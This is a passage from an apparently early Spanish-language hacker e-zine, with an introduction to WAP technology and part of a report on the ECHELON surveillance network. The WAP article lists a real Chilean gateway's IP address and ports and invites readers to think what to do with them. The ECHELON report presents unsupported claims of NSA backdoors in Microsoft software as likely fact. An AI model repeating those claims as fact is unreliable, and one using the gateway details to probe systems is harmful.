entendimiento de este escrito y al incentivo de investigacion por parte del underground. Lo unico que quiero con este escrito sobre WAP, tecnologia apasionante de la que quiero aprender mas, es solo dar una nocion de lo que es y algo de informacion. Tambien quiero insitar a estudiar y tratar de descubrir cosas nuevas sobre WAP, cosas que nos pueden ayudar en nuestro desarrollo en la informatica :) El articulo no es muy extenso, una por razones de tiempo (paso menos tiempo off line y al frente de mi chatarra de lo que pasaba el a~o pasado), tambien porque no lo creo muy necesario (a buen entendedor pocas palabras), por ser solo una introduccion a esta tecnologia. Que es la sigla WAP? --------------------Para muchas personas las siglas WAP, no tienen ningun significado, pero cada vez mas usuarios ocupan esta tecnologia, y mas empresas la desarrollan; ya que facilita el acceso a datos y servicios a traves de aparatos moviles (telefonos celulares, handhelds, palmtops y otros) por medio de la Internet, o sea no se necesita de un computador conectado a la red para poder acceder a los contenidos y servicios de la misma. WAP (Wireles Application Protocol, por sus siglas en ingles) es el protocolo para aplicaciones inalambricas. Consiste en un conjunto de especificaciones, que se han desarrollado por

medio del WAP Forum y que permite la utilizacion del WML (Wireless Markup Language) que es el lenguaje de marcas inalambrico, asi como de WBMP (Wireless Bitmap) utilizado para graficos monocromaticos, permitiendo que los desarrolladores dise~en aplicaciones de interconexion para dispositivos portatiles. Ojo, el WAP Forum es el que lleva los estandares, y la batuta, por decirlo asi, del lenguaje que se desarrolla en WAP. El Protocolo de Aplicaciones Inalambricas o Wireless Application Protocol (WAP), esta causando "furor" dentro de las nuevas tecnologias de comunicacion, ya que gracias a este protocolo de comunicacion se estandarizan las formas de desplegar informacion dentro de aparatos moviles, y amplia los beneficios que ofrece la web, a personas que no estan acostumbrados a usar la red. El principal atractivo de la tecnologia WAP es la bidireccionalidad e interaccion de la comunicacion del usuario con cualquier sitio de la inet, lo que nos puede favorecer para poder hacer algo ahi, no :). Ojo lo que acabo de decir, de lo que es WAP, no es lo mismo que ofrecian antes las empresas de telefonia movil, lo que era solo mensajeria corta, o sea solo se leia el contenido que los proveedores querian que leyeran los usuarios, y que estaban previamente definidos, y en ellos el usuario no tenia participacion alguna. El desarrollo en Internet ------------------------Un ejemplo claro de la aplicacion de esta tecnologia es el anuncio de Amazon.com de la adaptacion de su web para que los usuarios de dispositivos moviles puedan tener acceso a sus contenidos, lo que representa una importante ampliacion de su negocio ya que para vender sus libros y otros articulos ya no es requisito que el comprador este frente a una computadora conectada a la red, sino que basta con que oprima un par de teclas en su aparato movil y la operacion es realizada. Ya en Chile hay empresas de telecomunicaciones que estan desarrollando la navegacion en celulares, como es el caso de Telefonica, Smartcom y Entel, todos han firmado alianzas estrategicas con otras empresas para que desarrollen esta tecnologia en sus sitios. WAP, esta llegando fuerte en toda latinoamerica, con mas desarrolladores y usuarios, pero para mi gusto es bastante dificil que erradique a los PCs, porque en los computadores se pueden realizar muchas mas funciones y son mas vistosos para los usuarios comunes. Normalmente los sitios WAP son http://wap.dominio.com, como es el caso de wap.yahoo.com, wap.entelpcs.cl, wap.amazon.com, wap.latercera.cl, y muchos otros. WML, codigo de hipertexto ------------------------En el web se utiliza el HTML para desplegar toda la informacion de los sitios, pero en el caso de los equipos que esten conectados con la tecnologia WAP, se utiliza un codigo llamado WML, que se adecua a las limitaciones que poseen los aparatos en el que se despliega la informacion, que son mucho mayores que las de un navegador y computador tradicionales; es diferente una pantalla de 14 o 16 pulgadas, que una enana de un celular o un Palm. Obviamente el WML no es tan vistoso como el HTML, por las limitancias que ofrecen los lugares en que se despliega.

Para aprender el codigo de hipertexto WML, se necesitan conocimientos basicos en la creacion de paginas web y en la programacion en java script, pero lamentablemente la informacion en castellano, como tutoriales y esas cosas, es escasa. Ya estan en Internet programas gratis para desarrollar estas tecnologias como el Web Site Editon y otros, que son todos de bastante utilidad. Vale decir que la informacion en castellano es bastante escasa. Todo depende de la pantalla --------------------------En este protocolo (WAP), todo depende de la medida de la pantalla en que se despliegan los contenidos, por ejemplo es totalmente diferente en un celular tradicional la presentacion de los contenidos (pantalla bastante peque~a) que en un PALM, porque la pantalla del PALM es mucho mas grande y por lo tanto se pueden reproducir mas lineas de texto, e imagenes. Para que los dispositivos reproduzcan esta tecnologia deben correr sobre sistemas operativos creados para tales efectos como lo son WindowsCE, el PalmOS, y otros. En el caso de del PalmOS, viene incluido en todos los Palm, y el WindowsCE (Micro$oft siempre metido), y tambien en la mayoria de los telefonos moviles digitales (nokia, ericcson, motorola y otros mas). Como funciona? --------------La forma de ingresar a la red es sencilla: se origina la llamada, la que se direcciona hasta un computador (un compresor de datos o algo asi), que se llama Gateway WAP, donde la informacion es comprimida para optimizar el ancho de banda por donde viaja la informacion. Este lo saca de la Inet y lo manda al destinatario, que por ejemplo seria un telefono movil con tecnologia WAP. Lo que anteriormente nombre como Gateway WAP, y lo de Internet, serian como dos servidores (eso en la practica), el servidor llamado Gateway, es el que optimiza la info del otro server (Internet), para que sea visto por un aparato movil. Lo anterior seria como algo asi:

na)

/______________ =============== ====================== \ = Internet = ===== Gateway WAP ==== ______________\ = = ====================== / =============== = Compresor de datos = = optimizacion de = _______________________________\

/\ Real Movil (ante

= ancho de banda = / / \ ====================== /______________________________ / \ \ |______| __ | | | | || ((((((((((((((((((((((((((((((((((((((((((((((((((( | | | | ||____ | | | | | | ____________________________________________\ | | | | |_____| / | | | | | | /___________________________________________ | | | | | | \ | | | |

|_____| Terminal movil (telefono celular)

========

Por lo menos en el caso del servicio ofrecido por Entel PCS es de 9.6 kbps, pero la velocidad con que se conecta el usuario es de 14.4 kbps, esto gracias a la intervencion del Gateway WAP Componentes importantes del WAP ------------------------------WAP esta formado de una serie de capas, por decirlo asi, cada una con su funcionaldad especifica: *ENTORNO INALAMBRICO DE APLICACION (WAE) *PROTOCOLO INALAMBRICO DE SESION (WSP) *PROTOCOLO INALAMBRICO DE TRANSACCIONES (WTP) *PROTOCOLO INALAMBRICO DE TRANSPORTE SEGURO (WTLS) *PROTOCOLO INALAMBRICO DE DETAGRAMAS (WDP) *Otros servicios y aplicaciones *Entorno inalambrico de aplicacion (WAE): Son las siglas de Wireless Application Environment, es como una combinacion entre el WWW y las tecnologias moviles. Esto incluye el decodificador (Gateway), en el que se utiliza el WML (del que ya hable), el WMLscript, el WBMP que es para las imagenes y otros formatos que se ocupan de lo que seria las cuentas de los usuarios, su info y agendas personales. *Protocolo Inalambrico de Sesion (WSP): En ingles se llama Wireless Session Protocol, proporciona en si dos servicios, la primera es que ordena la coneccion que funciona sobre el protocolo que le sigue (WTP), y como segundo en el funcionan detagramas seguros y no seguros que van por encima del WDP. *Protocolo Inalambrico de transacciones (WTP): Aqui existen, lo que se podria llamar como detagramas seguros y no seguros, estan la peticion insegura de una via de comunicacion, la peticion segura de una via de comunicacion, y la transaccion de dos vias de manera segura, todo esto de forma ovbia es para la peticion de informacion por parte del usuario al server y del server al usuario, de forma segura y no segura. *Protocolo Inalambrico de transporte seguro (WTLS): Proporciona seguridad a la transferencia de datos, esta dise~ado especialmente para un ancho de banda peque~o, esto le da seguridad y autenticidad al servicio WAP, es utilizado para el comercio electronico gracias a su seguridad. *Protocolo Inalambrico de Detagramas (WDP): Se ocupa de que funcionen los protocolos anteriormente mencionados, y que su funcionamiento sea lo mas espedito posible. *Otros servicios y aplicaciones: Serian todas las otras cosas que no mencione anteriormente como servicios de la tecnologia WAP.

Caracteristicas del primer Gateway WAP publico chileno -----------------------------------------------------A continuacion les dare las caracteristicas del primer Gateway WAP publico que esta operando en Chile, a ver que se les ocurre con esta informacion, quizas algo que yo no haya pensado todavia :) Las caracteristicas del GateWay son las siguientes : *Modo no orientado a la conexion, no segurizado, modo transaccional - WDP/WSP en la puerta 9200 *Modo orientado a la conexion, no seguro, modo transaccional - WDP/WTP/WSP en la puerta 9201 *Modo no orientado a la conexion, seguro, modo transaccional - WDP/WTLS/WSP en la puerta 9202 *Modo orientado a la conexion, seguro, modo transaccional - WDP/WTLS/WTP/WSP en la puerta 9203 *Acceso por medio de Internet al GateWay *Acceso Telefonico (En Segunda Etapa) Ademas de soporte para transacciones seguras mediante https , Secure Sockets Layer (SSL)! ~~ Por lo que pude ver hace poco, el IP del server que interactua con el Gateway WAP era 200.29.18.110 Tambien aqui les va el listado de emuladores y telefonos WAP que soporta, obviamente no estan todos, pero son bastantes: 1. 2. 3. 4. 5. 6. 7. 8. 9. Motorola, Mobile ADK v1.1 Phone.com SDK v4.0 Ericsson WAPIDE SDK v2.1 (R320 y R380) Nokia SDK v1.3b (7110) o 2.0 Nokia 7110 Ericsson R320 Siemens s35i WinWap Pro Ezos

Despedida --------Bueno hasta aqui llego mi entrega y les haya aclarado un poco la ustedes, porque no mejor se ponen ense~an como se escribe de verdad de info sobre WAP, ojala les haya gustado, pelicula, si no les gusto, bueno cosa de a escribir articulos ustedes mismos y nos y con buen contenido.

Ya saben la invitacion esta hecha, investigen, lean, informense y escriban articulos para la difucion de la investigacion de WAP y cualquier otro tema de la informatica, que tan apasionante es..... Por cualquier duda, consulta, puteada o correccion de este escrito, sirvase

escribir a: krajeck@usa.net Mi proxima entrega sera mas extensa, es como la continuacion de este escrito, en el que hablare sobre el futuro de WAP, y sus posibles sucesores, que cambiaran la Inet movil y la haran parecida a la de los PCs, y el funcionamiento de esos sucesores Bibliografia: www.wapforum.com (dirige los estandares de WAP) www.chilewap.cl www.wap.com BBBBBB.kuma.Kon (pagina de Charlie) :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 08. El Informe Echelon ::--.. by Zagato ZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZ ZZZZZZZ ZZZZZZZ THE ZZZZZZZ ZZZZZZZ ZZZZZZZZZZZ ZZZZZZZZZZZ ZZZZZZZ ZZZZZZZ FILES ZZZZZZZ ZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZ EL INFORME ECHELON <CANTO PRIMERO> Creado, dirigido, redactado, investigado, y muchos mas *.do por: ZAGATO Bueno... Saludos, nobles viajeros... Estaba yo entregado a aburridas meditaciones, una calurosa tarde veraniega, cuando pense en escribir este articulo. La principal motivacion, si descartasemos al ya nombrado aburrimiento, era sencilla... Algun tiempo atras habia investigado relativamente grandes cantidades de informacion sobre ECHELON, pero tener gran cantidad de paginas web, con sus correspondientes imagenes, en mi humilde disco rigido de 2gb era algo molesto, no solo en cuanto a espacio (ya que tampoco ocupan tanto) sino al caos que reinaba en el directorio donde las mantenia almacenadas... Entonces fue que se me ocurrio la idea de crear un informe que mantuviera toda la informacion importante sobre el tema en un peque~o .txt, y donde pudiera acceder a dichos datos sin buscar en un mar de directorios lo que deseaba consultar... Asi que con paciencia, cafe, iron maiden, y la banda sonora de MK-Rayearth como unicas compa~ias, nacio este humilde documento sobre lo que ahora navegan vuestras miradas... Solo una peque~a nota aclaratoria antes de comenzar... Gran parte de este

texto NO son escritos mios, sino transcripciones y traducciones de reportes de comisiones investigadoras apadrinadas por los gobiernos europeos, agrupaciones cientificas, y otras fuentes como la oficina de patentes de los EUs... Quedais advertidos para que no me inundes despues la cuenta de mail con mensajes del tipo "Que Lamer!!! Lo unico que hiciste fue copiar!!!", mas porque tampoco fue eso lo unico que hice... hay partes del texto que SI son de mi autoria, y la informacion que NO lo es esta ordenada de forma que sea facilmente comprensible por cualquier ser viviente con un IQ mayor que el de una ameba... Y, porque no me dedico a plagiar trabajos agenos, al final del informe iran todas las URL de donde extraje la informacion, para que profundiseis mas en el tema por vuestra propia cuenta... Y una peque~a dedicatoria... Serena, mi amada rosa invernal, mi dulce princesa Esmeralda, esto, como todo aquello que hago, va dedicado a ti, que me rodeas con el aura de tu dulzura y calidez... Gracias, Serena, por ser como eres!!! Ahora si... me despido de vosotros y les dejo con el informe, antes de que los aburra lo suficiente como para que odien a este escritor y under novato... Au-revoir... ***************************************************************************** Muchos de ustedes ya deben haber oido hablar de ECHELON, otros no. De los que si lo conocen, muchos deben haber buscado informacion sobre el, con resultados tanto buenos como malos. El objetivo de este informe no es demostrar nada, ni poner en sus manos informacion clave, sino introducir, a aquellos que no poseen conocimiento de esta amenaza, al tema en cuestion, y ofrecerles a todos ustedes (tanto conocedores del tema como a aquellos que no tienen ni idea de que se trata) el resultado de mis investigaciones sobre ECHELON. Pero, para aquellos que no saben de que estoy hablando, comenzemos por el principio... ECHELON es un termino que identifica a un sistema de intercepcion global de informacion operado por, al menos, las agencias de inteligencia de cinco naciones: Estados Unidos, El reino Unido, Australia, Canada, y Nueva Zelanda. Existen rumores de otras naciones involucradas, pero las, en cierta forma, confirmadas son estas cinco que he nombrado. El mando de el Proyecto ECHELON pertenece, principalmente, a la NSA (la agencia de seguridad nacional de los Estados Unidos), quien cordina sus acciones con otras agencias de inteligencia en base al Acuerdo UKUSA, del que ya hablare mas tarde. De acuerdo a varios informes (provenientes de fuentes de diversos niveles de credibilidad) el ECHELON original data de 1974, aunque sus funciones, capacidades, y prioridades han sido presa de multiples mejoras desde entonces. De acuerdo a dichos informes, ECHELON seria capaz de interceptar muchos (sino todos) los patrones de diversas formas de comunicacion sobre el globo, para luego procesarlos en busca de ciertos grupos de datos que significarian un peligro para sus creadores, o que les brindarian una importante ventaja, tanto militar, politica, cientifica o economica. Aparentemente, ECHELON tiene la capacidad de interceptar dichos datos de muy diversas formas. Se utilizarian complejos sistemas de antenas, redes satelitales, dispositivos de monitoreo de lineas telefonicas, "Sniffers" ocultos por toda la extension de la Red, y software automatizado de busqueda para localizar sitios web de relativa importancia. En 1982 fue encontrado, en las lineas telefonicas submarinas, un pequeno dispositivo para "Pinchar" dichas lineas, lo que sugiere la existencia de una indeterminada cantidad de interceptores de comunicaciones telefonicas, tanto en las lineas submarinas como en lineas normales. Segun algunos reportes, ademas, las naciones

pertenecientes al Proyecto ECHELON entrenarian agentes especiales con la funcion de instalar y controlar dispositivos de alta tecnologia destinados a recolectar informacion para ECHELON. Esta informacion, recolectada a traves de todos los sistemas de comunicacion y transmision de datos existentes en el mundo actual, seria clasificada y analisada por una (o varias) I.A, con la ayuda de un sistema llamado DICTIONARY, una red formada por una desconocida cantidad de computadoras de ultima generacion creadas con el proposito de acumular, comparar, y descifrar la informacion interceptada. Los Estados Unidos han negado, desde que comenzase a circular la escasa informacion sobre este proyecto, su existencia, a pesar de que los gobiernos de Australia y Nueva Zelanda hayan admitido este hecho. El Parlamento Europeo ha, hasta la fecha de hoy, apadrinado dos investigaciones que intentasen descubrir los objetivos y las herramientas disponibles para ECHELON. A pesar de que al principio estos reportes enfocaban las actividades de ECHELON como una forma de controlar las actividades civiles, investigaciones recientes han sacado a la luz una indeterminada cantidad de pruebas que sugieren que las habilidades y funciones de ECHELON habrian sido seriamente subestimadas. Un reporte mas reciente indicaria que ECHELON seria utilizado para Espionaje industrial, politico, economico, cientifico, militar, y como un medio para obtener importantes ventajas en esos campos, asi como proveer informacion para sabotaje economico e ingenieria politica. Actualmente, los paises europeos han creado varias comisiones de investigacion dedicadas exclusivamente a descubrir los medios por los que ECHELON seria una amenaza, y poner en practica operaciones de contra-inteligencia, asi como una seria de planes y contramedidas, tanto electronicas como fisicas, para evitar una mayor amenaza. El Ex-Presidente Clinton emitio una ley de fondos que permitiria al gobierno mantener bajo control proyectos como ECHELON, pero el subsecuente reporte de la NSA le brindo poca, sino ninguna, informacion sobre el asunto... Pero, desde el momento en que la CIA y otras agencias de inteligencia de varias naciones se encuentran involucradas, es dificil creer que los gobiernos de sus respectivas naciones puedan ser algo mas que meras marionetas bajo su control... O simples "Voceros de Prensa". Pero, nada termina aqui... Uno de los informes apadrinados por el gobierno frances habria descubierto que, agentes de inteligencia del Proyecto ECHELON, estarian introducidos dentro de Microsoft (puede ser que no dejen de meterse en nada?), introduciendo peque~os subsistemas en sus programas, facilitando la deteccion, recuperacion y analisis de toda accion realizada en nuestros sistemas... O sea, la NSA de los states tendria acceso no solo a lo que enviamos por la red, sino a logs de lo que ocurre en nuestros sistemas (y nosotros preocupandonos por esos bastardos de Aureate)... Sobre este asunto (Mocosoft en relacion a Echelon) volveremos luego... Bueno... Hasta aqui, la introduccion. En este punto, algunos de ustedes deben pensar que he sucumbido a la locura, victima de infinidad de teorias conspiratorias y grandes dosis de William Gibson, George Orwells, y X Files... Pero, aunque paresca extra~o, e increible, esto es lo que he encontrado... IAs, servicios de inteligencia, agentes especialmente entrenados para operacion e instalacion de equipos de ultima generacion, programas automatizados, y grandes redes de computadoras creadas para almacenar los analisis de ECHELON. Puede parecer el resultado de un demente sin cura, pero esto es solo el comienzo... Pero... La pregunta seria... Cuentan con la suficiente tecnologia como para hacer algo asi. Mmmmm, bien. Esto es algo que he encontrado al respecto. En la oficina de Patentes y marcas registradas de Estados Unidos, bajo el Nro.5,418,951, se encuentra algo de informacion relacionada con esta pregunta. En la seccion de "Trasfondo de la invencion" puede leerse:

1- Campo de la invencion Esta invencion trata de un metodo de recuperacion de documentos, y mas especificamente, de un metodo de recuperacion de documentos capaz de busqueda completa de textos sin la necesidad de palabras clave o informacion contextual. Este metodo puede ser utilizado para localizar, recuperar y ordenar documentos por tema o lenguaje. Este metodo es tambien util para identificar, recuperar y ordenar cualquier tipo de comunicacion, ya sea esta acustica o simbolica, mientras pueda ser representada en un formato comprensible para el sistema. En otras sub-secciones puede leerse: En un articulo publicado por R. Colin Johnson, en el Electronic Engineering Times del 17 de Febrero de 1992, era indicado el extenso esfuerzo de investigacion que era gastado en encontrar mejores maneras de buscar bases de datos textuales para recuperar documentos de importancia para el usuario. En un articulo publicado por G. Salton en Sciense (volumen 253, 30 de agosto de 1991), se indica que el analisis de texto es un problema debido a que existe una necesidad de retirar solo los documentos de interes de grandes bases de datos. La solucion a este problema seria generar identificadores de contenido. (...) Dichos sistemas de recuperacion son definidos como Sistemas de recuperacion de texto completo. Se nombran, tambien, algunas otras patentes que, a pesar de no haber podido investigarlas, parecen referirse a: Patente Nro. 5,020,019, titulada "Sistema de recuperacion de documentos. Es describido un sistema que busca documentos utilizando palabras claves mientras aprende, caracteristica que le permite al usuario asignar peso a las diferentes palabras clave en respuesta al resultado de la busqueda anterior. Patente Nro. 4,985,863, titulada "Almacenamiento y recuperacion de documentos". Es describido un metodo donde los documentos son almacenados en secciones. Secciones de texto, en lugar de palabras clave, son entonces utilizadas para recuperar documentos similares. Patente Nro. 4,849,898, titulada "Metodo y aparato para identificar la relacion de significado entre palabras en expresiones textuales". Se describe un metodo que utiliza un analisis semantico de palabras de un documento para poder determinar cuales de estas palabras significan una misma cosa. Este metodo es utilizado para recuperar documentos o porciones de documentos que tratan del mismo topico que las palabras clave. Patente Nro. 4,823,306, titulada "Systema de busqueda de texto". Describe un metodo que genera sinonimos de palabras clave. Diferentes valores son entonces asignados a cada sinonimo para guiar la busqueda. Patente Nro. 4,358,824, titulada "Almacenamiento y recuperacion de correspondencia de Oficina". Se describe un metodo que reduce los documentos a abstraciones grabando las palabras clave usadas en cada documento. Las palabras clave son entonces utilizadas para buscar los documentos de interes. Cabe aclarar que este documento pone mucho enfasis en remarcar que el sistema en cuestion no utiliza ninguno de los sistemas anteriores de busqueda y recuperacion. Luego, refiriendose a esta patente en particular, puede leerse:

Sumario de la invencion Es un objetivo de esta invencion proveer un metodo de identificar el lenguaje en que un documento dado esta escrito. Es otro objetivo de esta invencion proveer un metodo de recuperar documentos, en un lenguaje particular, de bases de datos, por tema. Es otro objetivo de esta invencion proveer un metodo de ordenar documentos en una base de datos por lenguaje. Es otro objetivo de esta invencion proveer un metodo de ordenar documentos en una base de datos por tema. Y sigue diciendo: Estos objetivos son alcanzados por una nueva aproximacion a la identificacion, recuperacion y clasificacion de documentos. El termino documentos se refiere a texto, sonido, o graficos coomprensibles por la maquina. La presente invencion usa una tecnica de reconocimiento de patron basada en comparaciones N-Gram entre documentos mientras permite una reduccion en requerimientos de memoria (al ser comparada con los metodos de palabra clave y diccionario) y un incremento en la performance. El usuario puede configurar el concepto utilizado para determinar cuando varios documentos son similares. JEJE... Y lo mejor viene ahora... El metodo de la presente invencion puede ser facilmente implementado en cualquier lenguaje de programacion o en Hardware para cumplir las tan dificiles tareas de identificar el topico de un documento, aun si estos documentos estan escritos en lenguajes ideograficos como el Japones. Este metodo puede tambien ser usado para clasificar documentos en una base de datos como diferentes categorias sin la necesidad de identificacion de las categoria o documentos contenidos alli. En vez de confiar en palabras clave, tablas de sinonimos o informacion contextual, los objetivos de la presente invencion son cumplidos mediante una tecnica de reconocimiento de patron. La presente invencion se basa en la hipotesis de que documentos que son similares en lenguaje y/o topico lucen similares, en que tienden a contener varios de los mismo n-grams (consecutivas apariciones de un caracter N). Ellos son similares no solo en palabras clave sino en todas las palabras utilizadas. La hipotesis sugiere la conclusion de que el topico de un documento puede ser confiablemente deducido por enumerando los N-Grams contenidos en el, y comparando el resultado de dicha operacion con los N-Grams enumerados en otro documento de referencia. Ejemplos conocidos de textos en diferentes lenguajes y topicos son almacenados como documentos de referencia. No hay ninguna restriccion en la forma que estos documentos de referencia pueden tomar. Texto de cualquier origen puede ser utilizado. El numero de documentos de referencia y n-grams contenidos en estos documentos deben ser estadisticamente significativos en tama~o. Ha sido empiricamente determinado que para identificacion de lenguaje se necesitan aproximadamente diez documentos, cada uno conteniendo aproximadamente mil caracteres. Para identificacion de topico dentro de un lenguaje particular, que es una distincion mas exacta que la identificacion de lenguaje, aproximadamente cincuenta documentos de las mismas caracteristicas. Los documentos de referencia son cambiados a N-grams. Esto se logra creando una lista separada, para cada documento de referencia, de todos los unicos n grams que aparacen en el documento de referencia (donde N es tipicamente convertido a algun valor, como N=5). El documento no identificado es tambien convertido en una lista de unicos N-grams.

Pesos son asignados a cada unico N-gram. El peso es determinado por la relativa frecuencia de ocurrencia de cada n-gram en ese particular documento de referencia (el numero de veces que un N-gram aparece en un documento de referencia, dividido por el total agregado de todas las apariciones de N grams dentro de ese documento de referencia.). Pesos son asignados a cada N gram en cada documento de referencia y a cada N-gram en el documento no identificado. Lo normal dentro de los documentos de referencia es entonces removido de los documentos de referencia y del documento no identificado. Esto se logra al listar los N-grams unicos entre los documentos de referencia. En segundo lugar, un peso normal es asignado a cada unico n-gram del documento de referencia, basado en la frecuencia relativa de ocurrencia (la suma de los pesos individuales de ese n-gram para todos los documentos de referencia, dividido por el numero total de documentos de referencia) El peso de normalidad de cada n-gram es entonces sustraido del peso de su correspondiente n-gram, dentro de cada documento de referencia, y del peso de su correspondiente n-gram dentro del documento no identificado. El documento no identificado es entonces comparado a cada uno de los documentos de referencia. Esto se logra comparando el puntaje del documento no identificado contra cada uno de los documentosde referencia. La puntuacion del documento no identificado con respecto a un documento de refencia indica el grado de similitud entre ambos documentos. Despues prosige con ejemplos de dicho proceso... Pero creo que en este punto todos sabemos que hace, y como... Bueno... Creo que esta parte ha sido bastante clara... Existe otro numero de patente que tengo que revisar, y que pienso agregar en cuanto pueda accesarla (todos los links que haye hasta ahora estan defectuosos) Recordemos lo que dije al principio... Sobre Microsoft y su colaboracion al proyecto... Para entender mejor esto, recordemos lo que ocurrio con Aureate. Para los que no esten informados de esto, puedo decirles que una compania llamada Aureate, conocida por agregar banner propagandisticos en versiones shareware de programas que pueden ser bajados de la red, instalaria, junto con estas versiones Shareware, un peque~o programa llamado AureateSpy, que agrega archivos en nuestro sistema Winbugs que envian informacion sobre nuestras visitas a la web y lo que se encuentra en nuestras maquina a gente de Aureate, que supuestamente la utilizaria para generar un "Informe de Mercado" (no les hubiera resultado mas sencillo realizar una encuesta de mercado?)... Ahora consideremos un momento el asunto... si una empresa de software no demasiado poderosa puede agregar un sistema similar en nuestros sistemas, consideremos lo que Mocosoft podria realizar... Ni siquiera tendria que instalar archivos de relativa sencillez de deteccion, pues los codigos nesesarios estarian introducidos en el codigo fuente de su Pseudo-SO... Ademas, si sumamos heste echo a que podrian, con suma sencillez, crear programas que facilitaran la recuperacion de dicha informacion (al fin y al cabo, ellos son los unicos en comprender completamente el funcionamiento de este engendro...), tenemos que Si trabajan en conjunto con la NSA, dicha agencia tendria facil acceso a todo loque ocurre en nuestros sistemas... Cada programa que instalamos, cada archivo que bajamos, cada publicacion electronica que leemos, cada modificacion de registro, cada conexion a la red, cada cosa que decimos y hacemos en ella... Para los que lo dudaban, Aureate ha demostrado que eso era extremadamente sencillo de realizar... Asi que, alguien duda que escondido en sus varios miles de lineas de codigo microsoft halla ocultado algo similar?... Yo creo que es ovbio que, aunque no lo usaran junto a la NSA, Billy lo haria... Y si la NSA agrega un cheque de por medio, o algun "beneficio" con respecto a la ley de monopolios... Bueno,

tenemos a Gates, Bill Gates, agente especial de la NSA... Ademas, y considerando que la mayor parte de los sistemas mundiales de informacion utilizan software microsoft, ya sea para operar sus sistemas, administrar sus redes, crear sus webs, y proteger sus sistemas (Des-proteger sus sistemas?), tendriamos Bugs puestos a conciencia, backdoors ocultas en el sistema operativo, Y firewalls que impiden el acceso de un intruso, pero no consideraria a un intruso a gente de Microsoft y la NSA... Interesante... Sobre todo si consideramos que el informe que nombre tambien afirma que Microsoft ha sido patrocinada por la NSA desde sus comienzos como empresa... He escuchado rumores, que no me cuesta demasiado creer, de que dicha Backdoor instalada en el sistema (envasada en origen) ya seria conocida... Pero aquellos a quienes he preguntado de dicho asunto, poco sabian de el, asi que esto no esta confirmado... Otra cosa que teniamos pendiente desde el principio era la informacion sobre el UKUSA... En 1947, y como natural extension de su colaboracion militar, los EU y el Reino Unido firmaron un tratado secreto, que no fue conocido hasta marzo de 1999, donde unian sus fuerzas para conducir continuamente actividades de COMINT (inteligencia de comunicaciones) a nivel global. Posteriormente, al menos otros tres paises se sumaron a esta operacion: Canada, Australia y Nueva Zelanda. Ya desde antes del tratado UKUSA, la NSA habia puesto en marcha una operacion llamada SHAMROCK, cuyas actividades permanecieron ocultas hasta 1975, cuando las investigaciones del escandalo Watergate llevo a hechar algo de luz sobre el asunto. El ocho de agosto de ese mismo a~o, el director de la NSA, Teniente General Lew Allen, admitio ante un comite de investigaciones, que la "NSA sistematicamente intercepta las comunicaciones internacionales, tanto de voz como de cable". El tambien admitio que "Mensajes para y de ciudadanos americanos han sido interceptadas para reunir inteligencia exterior". Posteriormente, el Departamento de Justicia de los EU investigo posibles ofensas criminales realizadas por la NSA. En agosto de 1968, el primer satelite de COMINT de los EU fue puesto en orbita, seguido rapidamente por un segundo satelite. Los satelites eran controlados desde una estacion en tierra germana. El principal objetivo de dicho proyecto era la union sovietica, y las circunstancias geograficas favorecieron a la NSA, dado que las lineas de comunicacion eran altamente accesibles. El exito de CANYON llevo a dise~ar y emplear nuevos tipos de satelites COMINT, los llamados CHALET. La estacion terrestre elegida para las series CHALET se encontraba en Inglaterra. Los primeros dos satelites CHALET fueron lanzados en junio de 1978 y en octubre de 1979. Siguiendo a la aparicion del nombre del primer satelite en la prensa, el proyecto fue renombrado como VORTEX. En 1982, la NSA recibio nuevos fondos y facilidades para operar cuatro satelites VORTEX en forma simultanea.Cuando el nombre de VORTEX fue publicado en 1987, el proyecto se renombro MERCURY. El proyecto recibio un reconocimiento por apoyar la flota de los EU en el golfo persico, entre 1987 y 1988. Tras otro reconocimiento, en 1991, por la colaboracion durante las operaciones DESERT STORM y DESERT SHIELD, el proyecto es actualmente la principal fuente de COMINT contra israel, su mayor aliado en medio oriente. Las instalaciones de este proyecto fueron expandidas para incluir conexiones terrestres para nuevas redes de satelites lanzados entre 1994 y 1995. El nombre de la nueva serie de satelites permanece desconocida. La CIA, tambien, desarrollo su propia serie de satelites durante el periodo 1967 - 1985. Conocidos inicialmente como RHYOLITE, y luego como AQUACADE, estos satelites eran operados desde una estacion de control ubicada en australia. El proyecto original interceptaba solo las se~ales de baja frecuencia en las bandas VHF y UHF, Nuevos tipos de satelites de este tipo, llamados primero MAGNUM y luego ORION,tienen la capacidad de interceptar telemetria, radio VHF, telefonos celulares, se~ales de pagers, y nexos de datos moviles. Existe, tambien, una clase de satelite llamada inicialmente

JUMPSEAT y luego TRUMPET, lo que le premite a los EU interceptar transmisiones de origen en las latitudes nordicas, sitio poco cubierto por MERCURY o por ORION, y tambien interceptar se~ales de satelites de comunicaciones Rusos. En 1971, tambien, comenso una recoleccion sistematica de comunicaciones COMSAT ILC. Dos estaciones terrestres se construyeron con este proposito, una en Inglaterra y otra en los EU. Juntas, estas dos instalaciones, cubres los oceanos pacifico, atlanticos, e indico. Poco antes de 1980, una nuevo sitio se instalo en los EU. Entre 1985 y 1995, nuevas estaciones fueron construidas en los EU, Canada, Australia, y Nueva Zelanda, y la capacidad de las ya existentes se extendio. Hoy en dia sus capacidades se siguen expandiendo. Basado en la simple cuenta de los numeros de antenas instaladas en cada instalacion de los paises pertenecientes a la UKUSA, se puede sacar la conclusion de que, al menos, la UKUSA opera un minimo de 120 sistemas de recoleccion basados en satelites. ***************************************************************************** Bueno... me he quedado aqui... procurare aliviar un poco la presion sobre mi tiempo para darles la parte que sigue lo mas pronto posible, esperando terminar ya el informe... Disculpad cualquier molestia que este retraso os pudiera ocasionar, pero resulta que mi vida ultimamente se ha convertido en un caos de buscar trabajo (Quiero Linux y no tengo un cobre!!), problemas familiares ( <madre_molesta> Deja de estar siete horas conectado que el telefono lo pago yo/ <Zagato_arg> Tenes razon, no voy a estar mas siete, de ahora en mas voy a estar ocho / <madre_molesta> Entonces andate con tu computadora de mierda a otro lado!), problemas sentimentales, un formateo de mi sistema (con la consecuente perdida de muchos datos que debo volver a buscar), el paso a mejor vida de mi trackball (esto ultimo lo escribo controlando el puntero con los modos de accesibilidad, pues tampoco tengo un cobre para comprar otro!!!), y el hecho de adquirir una gran cantidad de nuevos textos sobre lo que nos compete 